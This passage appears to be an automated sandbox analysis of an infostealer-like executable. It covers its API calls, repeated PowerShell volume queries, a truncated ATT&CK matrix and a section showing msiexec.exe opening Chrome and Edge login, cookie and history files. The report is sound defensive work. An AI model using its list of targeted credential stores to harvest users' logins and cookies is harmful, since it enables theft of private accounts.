          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_6F331096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6F331096
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5312, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5312, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.2193215280.0000000020191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5312, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          Software Packing
          LSASS Memory24
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
